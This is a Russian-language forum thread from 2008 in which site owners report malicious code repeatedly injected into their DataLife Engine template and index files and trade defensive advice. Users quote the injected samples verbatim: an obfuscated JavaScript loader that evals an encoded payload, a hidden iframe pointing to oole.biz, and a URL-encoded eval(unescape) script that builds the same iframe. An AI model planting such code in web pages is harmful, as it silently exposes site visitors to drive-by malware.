BOOTKiller 0 Опубликовано: 16 февраля 2008 Рассказать Опубликовано: 16 февраля 2008 [quote]<script language=JavaScript>function rubban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,40,56,62,47,9,45,44,0,8,0,0,0,0,0,0,11,18,53,58,52,16,49,20,35,5,59,51,27 ,3,41,55,32,54,28,37,4,10,1,23,42,50,39,0,0,0,0,21,0,6,12,57,60,30,34,24,61,13,48 ,7,26,17,33,46,25,36,19,29,38,22,15,14,31,2,43);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(173^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}rubban('lrdj5@7QMCsQbZiQeMNfN@dj9z1S5@7KgMbYMZhPl0iFpHRnUa5F@0iK8HRHMKbj9McZwKbYvO1O xJbqvuRQpOhSyU1Zsr7Yev9FM47jyt6PAX1nPKRQIv2OyHhj5W92bZsFM3iKMZ7j8W9nkYcZRfcZTl1fx CbK907faX2HiXiF5ZsFE3pt_QgF9r7YIZiqpApHeZiBVHbqvtbFeOsjbrhSM@dj902qmU9F@0iK8HdqUA 9')</script><!-- 208.83.61.18 -->[/quote] такая штучка обнаружилась.. .вируса или вредоносного объекта не нашлось... может кто скажет чего по поводу кода интересного? Цитата Ссылка на сообщение Поделиться на других сайтах
Greeze 0 Опубликовано: 16 февраля 2008 Рассказать Опубликовано: 16 февраля 2008 нет повода для беспокойства. js скрипты не должны работать при использовании в таком виде. Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 066 Опубликовано: 16 февраля 2008 Рассказать Опубликовано: 16 февраля 2008 BOOTKiller, В смысле обнаружилась? Где вы обнаружили этот код? Цитата Ссылка на сообщение Поделиться на других сайтах
BOOTKiller 0 Опубликовано: 16 февраля 2008 Рассказать Опубликовано: 16 февраля 2008 Автор в индексовом файле и main.tpl Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 066 Опубликовано: 16 февраля 2008 Рассказать Опубликовано: 16 февраля 2008 в индексовом файле и main.tpl Меняйте все пароли и обязательно по FTP, проверяйте компютеры антивирусом и не храните пароли от FTP в FTP менеджерах, их лучше всегда вводить вручную при входе по FTP. Тот же случай что и с iframe только код другой. Цитата Ссылка на сообщение Поделиться на других сайтах
Greeze 0 Опубликовано: 16 февраля 2008 Рассказать Опубликовано: 16 февраля 2008 в индексовом файле и main.tpl непонял юмора.. зачем же туда втыкать . Цитата Ссылка на сообщение Поделиться на других сайтах
BOOTKiller 0 Опубликовано: 16 февраля 2008 Рассказать Опубликовано: 16 февраля 2008 Автор Ну это я промазал чуток.... Цитата Ссылка на сообщение Поделиться на других сайтах
IMPERATOR 1 Опубликовано: 16 февраля 2008 Рассказать Опубликовано: 16 февраля 2008 А мне постоянно вот эту дрянь пишут <iframe src=http://oole.biz/index.php width=1 height=1 style="display:none"></iframe> Заманали уже,пароли менял раз 10,помогает на 5 дней не больше! Запретил в чмодах изменять main.tpl ,так эти говнюки сюда навтыкали: ./templates/Default/vote.tpl ./templates/Default/speedbar.tpl ./templates/Default/comments.tpl ./templates/Default/feedback.tpl ./templates/Default/search.tpl ./templates/Default/navigation.tpl ./templates/Default/userinfo.tpl ./templates/Default/addnews.tpl ./templates/Default/stats.tpl ./templates/Default/fullstory.tpl ./templates/Default/addcomments.tpl А неделю назад вот эту дрянь постоянно прописывали <script type="text/javascript"> eval(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6F%6F%6C%65%2E%62%69%7A%2F%69%6E%64%65%78%2E%70%68%70%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E')); </script> Уже задрали! Не знаю как от них защищатся!? Цитата Ссылка на сообщение Поделиться на других сайтах
JaMaster 0 Опубликовано: 16 февраля 2008 Рассказать Опубликовано: 16 февраля 2008 IMPERATOR, ссылку на сайт? Цитата Ссылка на сообщение Поделиться на других сайтах
IMPERATOR 1 Опубликовано: 16 февраля 2008 Рассказать Опубликовано: 16 февраля 2008 Клиенту ссылку на сайт? Зачем? Может вы и есть хакер который здесь тусит и убирает конкурентов? Цитата Ссылка на сообщение Поделиться на других сайтах
WMDrakon 20 Опубликовано: 16 февраля 2008 Рассказать Опубликовано: 16 февраля 2008 IMPERATOR, не советую так неуважительно разговаривать. А правила надо соблюдать, так что прошу ссылку напишите, пожалуйста. Цитата Ссылка на сообщение Поделиться на других сайтах
mitriy 5 Опубликовано: 16 февраля 2008 Рассказать Опубликовано: 16 февраля 2008 если менял все пароли и 100% уверен что нет никаких вирусов на компе (nod или касперский молчат) то надо менять хостера. больше никак не добраться до ftp чужому. а вообще посмотри дату измения файла и в логах поищи с какого айпи обращение к нему было. я так помню года 3 назад valuehost запалил. админ у них баловался. в любом случае, если айпишник одинаковый все время меняет тебе файлы - можешь его забанить через хостера. Цитата Ссылка на сообщение Поделиться на других сайтах
omvitamin 0 Опубликовано: 17 февраля 2008 Рассказать Опубликовано: 17 февраля 2008 Ну вы даёте.. Вам айфреймы в индексы вставляют, а вы на систему валите что ли? Кроме как с помощью украденных паролей, это больше никак делать не будут. Так что проверяйте файлы, меняйте пароли и сканируйте свою машину на наличие дряни! Цитата Ссылка на сообщение Поделиться на других сайтах
IMPERATOR 1 Опубликовано: 17 февраля 2008 Рассказать Опубликовано: 17 февраля 2008 Ну вообщето адрес моего сайта стоит в моих личных данных! Ну могу дать http://www.imperia-of-hentai.ru/index.php Стоит Кис 7,0 ,пароли менял уже много раз! По логам попробую вычислить,но если человек использует прогу которая прячет или выдаёт левый айпишник не уверен что это поможет! Цитата Ссылка на сообщение Поделиться на других сайтах
Danila 8 Опубликовано: 17 февраля 2008 Рассказать Опубликовано: 17 февраля 2008 Закройтесь .ftpaccess'ом мне помогло. Цитата Ссылка на сообщение Поделиться на других сайтах
IMPERATOR 1 Опубликовано: 17 февраля 2008 Рассказать Опубликовано: 17 февраля 2008 Можно поподробней,что за зверь? ftpaccess? Цитата Ссылка на сообщение Поделиться на других сайтах
JaMaster 0 Опубликовано: 17 февраля 2008 Рассказать Опубликовано: 17 февраля 2008 а точно не NULL версия??? хотя я не вижу в файлах!!!!! Цитата Ссылка на сообщение Поделиться на других сайтах
WMDrakon 20 Опубликовано: 17 февраля 2008 Рассказать Опубликовано: 17 февраля 2008 JaMaster, нет, не null. 100%. Просто null или не null правила надо соблюдать. Цитата Ссылка на сообщение Поделиться на других сайтах
IMPERATOR 1 Опубликовано: 17 февраля 2008 Рассказать Опубликовано: 17 февраля 2008 Не знаю что такое NULL версия,оплатил пожизненую лицензию,как положено скачал и установил! На днях до 6,7 апгрейжу! Просто надойдает проверять антивирусом,а потом чистить за этими засранцами! Цитата Ссылка на сообщение Поделиться на других сайтах
komnervov 0 Опубликовано: 17 февраля 2008 Рассказать Опубликовано: 17 февраля 2008 У меня такая-же хрень на сайте с движком 5.3 кажется. Удаляю, через неделю снова висит, после последнего удаления дней 10 нет правда, сатом не занимаюсь давно, но случайно касперский завизжал кгда на него попал. Цитата Ссылка на сообщение Поделиться на других сайтах
seonet 0 Опубликовано: 20 февраля 2008 Рассказать Опубликовано: 20 февраля 2008 Не храните пароли в ftp-менеджерах! У нас такая же ситуация была, стали прописывать при коннекте ручками стало все нормально. Цитата Ссылка на сообщение Поделиться на других сайтах
error2k 2 Опубликовано: 25 февраля 2008 Рассказать Опубликовано: 25 февраля 2008 Хостер лопух скорее всего. Цитата Ссылка на сообщение Поделиться на других сайтах
ShVad 2 Опубликовано: 25 февраля 2008 Рассказать Опубликовано: 25 февраля 2008 А неделю назад вот эту дрянь постоянно прописывали Код <script type="text/javascript"> eval(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6F%6F%6C%65%2E%62%69%7A%2F%69%6E%64%65%78%2E%70%68%70%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E')); </script> Тоже самое, но в unit.php. Сменил пароль появился на следующий день немного другой код. Цитата Ссылка на сообщение Поделиться на других сайтах
IMPERATOR 1 Опубликовано: 27 февраля 2008 Рассказать Опубликовано: 27 февраля 2008 Сегодня сменил фтп пароли и никуда его ещё не вводил,всё равно опять вписали! Кто нибудь может сказать что сделать? Цитата Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 27 февраля 2008 Рассказать Опубликовано: 27 февраля 2008 Хостер лопух скорее всего. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.